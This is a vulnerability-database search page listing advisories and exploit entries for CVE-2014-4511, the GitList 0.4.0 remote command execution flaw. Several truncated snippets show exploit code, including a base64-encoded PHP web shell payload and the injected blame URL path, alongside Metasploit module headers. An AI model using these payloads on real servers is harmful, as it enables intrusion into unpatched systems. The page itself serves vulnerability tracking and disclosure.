Lucene search
K

15 matches found

exploitpack
exploitpack
added 2015/01/04 4:46 p.m.30 views

Gitlist-0.4.0

Date: 06/20/2014 Vendor Homepage: http://gitlist.org/ Software link: https://s3.amazonaws.com/gitlist/gitlist-0.4.0.tar.gz Fixed in: 0.5.0 Tested on: Debian 7 More information: http://hatriot.github.io/blog/2014/06/29/gitlist-rce/ from commands import getoutput import urllib import sys """ Exploi...

7.5CVSS6.4AI score0.8273EPSS
Exploits16
Check Point Advisories
Check Point Advisories
added 2014/10/06 12:0 a.m.7 views

GitList URL Remote Code Execution (CVE-2014-4511)

A code execution vulnerability has been reported in GitList. The vulnerability is due to insufficient input validation for meta-characters passed in the request URL. A remote attacker could exploit this vulnerability by sending a malicious request to the vulnerable server...

7.5CVSS3.7AI score0.8273EPSS
Exploits16
CVE
CVE
added 2014/07/22 2:0 p.m.90 views

CVE-2014-4511

Gitlist

7.5CVSS7.5AI score0.8273EPSS
Exploits16References6Affected Software1
Saint
Saint
added 2014/07/14 12:0 a.m.44 views

GitList blame resource command injection

Added: 07/14/2014 CVE: CVE-2014-4511 BID: 68253 OSVDB: 108504 Background GitList is a web-based git repository viewer. Problem A vulnerability in GitList allows remote attackers to execute arbitrary commands by sending a specially crafted request for the blame resource. Resolution Upgrade to...

7.5CVSS7.3AI score0.8273EPSS
Exploits16
Saint
Saint
added 2014/07/14 12:0 a.m.19 views

GitList blame resource command injection

Added: 07/14/2014 CVE: CVE-2014-4511 BID: 68253 OSVDB: 108504 Background GitList is a web-based git repository viewer. Problem A vulnerability in GitList allows remote attackers to execute arbitrary commands by sending a specially crafted request for the blame resource. Resolution Upgrade to...

7.5CVSS7.3AI score0.8273EPSS
Exploits16
myhack58
myhack58
added 2014/07/09 12:0 a.m.18 views

Gitlist Unauthenticated Remote Command Execution Exploit-vulnerability warning-the black bar safety net

require 'msf/core" class Metasploit3 'Gitlist Unauthenticated Remote Command Execution", 'Description" = %q This module exploits an unauthenticated remote command execution vulnerability in version0. 4. 0 of Gitlist. The problem exists in the handling of an specially crafted file name when trying...

2.8AI score
Exploits0
seebug.org
seebug.org
added 2014/07/08 12:0 a.m.34 views

Gitlist Unauthenticated Remote Command Execution

No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def...

7.1AI score0.8273EPSS
Exploits16
Packet Storm
Packet Storm
added 2014/07/06 12:0 a.m.34 views

Gitlist Unauthenticated Remote Command Execution

This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 'Gitlist Unauthenticated Remote Command Execution', 'Description' = %q This module exploits an unauthenticated remote command executio...

7.5CVSS0.6AI score0.8273EPSS
Exploits16
Metasploit
Metasploit
added 2014/07/01 1:10 a.m.19 views

Gitlist Unauthenticated Remote Command Execution

This module exploits an unauthenticated remote command execution vulnerability in version 0.4.0 of Gitlist. The problem exists in the handling of a specially crafted file name when trying to blame it. This module requires Metasploit: https://metasploit.com/download Current source:...

7.5CVSS0.8AI score0.8273EPSS
Exploits16
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.28 views

Gitlist <= 0.4.0 - Remote Code Execution

No description provided by source. from commands import getoutput import urllib import sys Exploit Title: Gitlist = 0.4.0 anonymous RCE Date: 06/20/2014 Author: drone @dronesec Vendor Homepage: http://gitlist.org/ Software link: https://s3.amazonaws.com/gitlist/gitlist-0.4.0.tar.gz Version: = 0.4...

7.5CVSS6.4AI score0.8273EPSS
Exploits16
Circl
Circl
added 2014/06/30 12:0 a.m.15 views

CVE-2014-4511

creationtimestamp| type| source ---|---|--- 2014-06-30 00:00:00+00:00| confirmed| https://www.exploit-db.com/exploits/33929 2014-07-07 00:00:00+00:00| confirmed| https://www.exploit-db.com/exploits/33990 2018-05-29 15:50:33+00:00| seen|...

7.5CVSS5.7AI score0.8273EPSS
Exploits16References3
Exploit DB
Exploit DB
added 2014/06/30 12:0 a.m.49 views

Gitlist 0.4.0 - Remote Code Execution

from commands import getoutput import urllib import sys """ Exploit Title: Gitlist 2: path = sys.argv2 print '! Using cache location %s' % path payload payload = "PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo=" sploit; python requests does not like this URL, hence wget is used mpath = '/blame/master/""echo...

7.5CVSS6.4AI score0.8273EPSS
Exploits16
exploitpack
exploitpack
added 2014/06/30 12:0 a.m.22 views

Gitlist 0.4.0 - Remote Code Execution

Gitlist 0.4.0 - Remote Code Execution from commands import getoutput import urllib import sys """ Exploit Title: Gitlist 2: path = sys.argv2 print '! Using cache location %s' % path payload payload = "PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo=" sploit; python requests does not like this URL, hence wget...

7.5CVSS7AI score0.8273EPSS
Exploits16
Packet Storm
Packet Storm
added 2014/06/30 12:0 a.m.31 views

Gitlist 0.4.0 Remote Code Execution

from commands import getoutput import urllib import sys """ Exploit Title: Gitlist 2: path = sys.argv2 print '! Using cache location %s' % path payload payload = "PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo=" sploit; python requests does not like this URL, hence wget is used mpath = '/blame/master/""echo...

7.5CVSS6.4AI score0.8273EPSS
Exploits16
0day.today
0day.today
added 2014/06/30 12:0 a.m.62 views

Gitlist <= 0.4.0 - Remote Code Execution Exploit

Exploit for multiple platform in category remote exploits from commands import getoutput import urllib import sys """ Exploit Title: Gitlist 2: path = sys.argv2 print '! Using cache location %s' % path payload payload = "PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo=" sploit; python requests does not like...

7.5CVSS6.5AI score0.8273EPSS
Exploits16
Rows per page
Query Builder